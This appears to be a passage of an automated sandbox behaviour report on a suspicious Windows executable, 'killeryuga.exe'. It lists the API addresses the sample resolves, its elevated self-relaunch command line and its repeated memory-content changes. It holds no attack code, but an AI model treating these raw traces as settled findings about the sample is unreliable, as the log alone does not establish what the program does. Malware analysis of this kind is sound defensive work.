Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleA, address_out = 0x76c312fc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76c349d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedExchange, address_out = 0x76c31462 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x76c3cb29 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x76c31400 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x76c317ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x76c34a2d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapDestroy, address_out = 0x76c335b7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = IsValidSecurityDescriptor, address_out = 0x74d4b58c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetFileSecurityA, address_out = 0x74d819b8 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ImpersonateLoggedOnUser, address_out = 0x74d4c57a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ObjectCloseAuditAlarmW, address_out = 0x74d83389 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CreatePrivateObjectSecurity, address_out = 0x74d69a12 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AreAllAccessesGranted, address_out = 0x74d830a8 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetAclInformation, address_out = 0x74d4cc89 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AreAnyAccessesGranted, address_out = 0x74d830b8 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetMetaFileBitsEx, address_out = 0x75af7121 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateDIBPatternBrushPt, address_out = 0x75afb6da True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetWindowExtEx, address_out = 0x75af1ace True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetMetaFileBitsEx, address_out = 0x75af6e71 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDeviceCaps, address_out = 0x75ae4de0 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = AngleArc, address_out = 0x75b14124 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDCBrushColor, address_out = 0x75b1232e True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = FlattenPath, address_out = 0x75b1555d True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetGraphicsMode, address_out = 0x75af138a True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetDIBits, address_out = 0x75ae7590 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CopyEnhMetaFileW, address_out = 0x75b1d9dc True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = Chord, address_out = 0x75b1439f True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = PlayMetaFile, address_out = 0x75afb2b9 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgID, address_out = 0x7560503c True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleUninitialize, address_out = 0x755feba1 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleSetMenuDescriptor, address_out = 0x7563dc53 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleLoadFromStream, address_out = 0x755e6143 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleQueryCreateFromData, address_out = 0x756632d4 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x75fe3c71 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetInstanceExplorer, address_out = 0x76016399 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = Shell_NotifyIconA, address_out = 0x76218af2 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = DragAcceptFiles, address_out = 0x760f1bf1 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowsHookW, address_out = 0x74f98ca2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetMessageQueue, address_out = 0x74f6c8e7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSysColor, address_out = 0x74f56c3c True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BroadcastSystemMessageW, address_out = 0x74f9c140 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x74f61341 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = OpenDesktopA, address_out = 0x74f6011a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetCapture, address_out = 0x74f7ed56 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MsgWaitForMultipleObjects, address_out = 0x74f60b4a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefDlgProcW, address_out = 0x77194100 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DdeUnaccessData, address_out = 0x74fa82f4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetClassInfoExW, address_out = 0x74f5b238 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetScrollBarInfo, address_out = 0x74f63ff8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharLowerA, address_out = 0x74f63e75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 8
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
System (252)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-03-24 16:36:39 (UTC) True 1
Fn
Get Time type = Ticks, time = 121961 True 1
Fn
Get Time type = Performance Ctr, time = 18452518574 True 1
Fn
Get Info type = Hardware Information True 249
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Process #7: killeryuga.exe
442 0
»
Information Value
ID #7
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --Service 2460 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:59, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
»
Information Value
PID 0x9d8
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 9DC
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
...
Host Behavior
File (3)
»
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Module (184)
»
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load GDI32.dll base_address = 0x75ad0000 True 1
Fn
Load ole32.dll base_address = 0x755e0000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 13
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringA, address_out = 0x76c33c5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesA, address_out = 0x76c5287b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatA, address_out = 0x76c5a959 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatA, address_out = 0x76c5a842 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeA, address_out = 0x76c58266 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFileEx, address_out = 0x76cb45ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FillConsoleOutputAttribute, address_out = 0x76cd71e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x76c31245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetCommMask, address_out = 0x76cb7198 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TransmitCommChar, address_out = 0x76cb75fe True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = PrepareTape, address_out = 0x76cbd232 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumePathNameA, address_out = 0x76cbbeed True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsBadWritePtr, address_out = 0x76c5d1ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextVolumeMountPointA, address_out = 0x76cbc189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnlockFileEx, address_out = 0x76c5d594 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryExA, address_out = 0x76ca9479 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteTapemark, address_out = 0x76cbd2d2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x76c3418b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x76c410b5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalDeleteAtom, address_out = 0x76c4cdad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringA, address_out = 0x76c5bc39 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleA, address_out = 0x76c312fc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76c349d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedExchange, address_out = 0x76c31462 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x76c3cb29 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x76c31400 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x76c317ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x76c34a2d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapDestroy, address_out = 0x76c335b7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = IsValidSecurityDescriptor, address_out = 0x74d4b58c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetFileSecurityA, address_out = 0x74d819b8 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ImpersonateLoggedOnUser, address_out = 0x74d4c57a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ObjectCloseAuditAlarmW, address_out = 0x74d83389 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CreatePrivateObjectSecurity, address_out = 0x74d69a12 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AreAllAccessesGranted, address_out = 0x74d830a8 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetAclInformation, address_out = 0x74d4cc89 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AreAnyAccessesGranted, address_out = 0x74d830b8 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetMetaFileBitsEx, address_out = 0x75af7121 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateDIBPatternBrushPt, address_out = 0x75afb6da True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetWindowExtEx, address_out = 0x75af1ace True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetMetaFileBitsEx, address_out = 0x75af6e71 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDeviceCaps, address_out = 0x75ae4de0 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = AngleArc, address_out = 0x75b14124 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDCBrushColor, address_out = 0x75b1232e True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = FlattenPath, address_out = 0x75b1555d True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetGraphicsMode, address_out = 0x75af138a True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetDIBits, address_out = 0x75ae7590 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CopyEnhMetaFileW, address_out = 0x75b1d9dc True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = Chord, address_out = 0x75b1439f True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = PlayMetaFile, address_out = 0x75afb2b9 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgID, address_out = 0x7560503c True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleUninitialize, address_out = 0x755feba1 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleSetMenuDescriptor, address_out = 0x7563dc53 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleLoadFromStream, address_out = 0x755e6143 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleQueryCreateFromData, address_out = 0x756632d4 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Fn
